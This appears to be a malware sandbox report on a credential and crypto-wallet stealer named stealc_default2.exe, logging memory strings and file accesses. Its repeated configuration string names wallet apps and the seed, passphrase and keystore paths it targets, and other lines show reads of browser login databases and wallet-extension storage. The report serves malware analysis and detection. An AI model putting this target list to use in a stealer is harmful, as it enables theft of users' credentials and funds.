                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
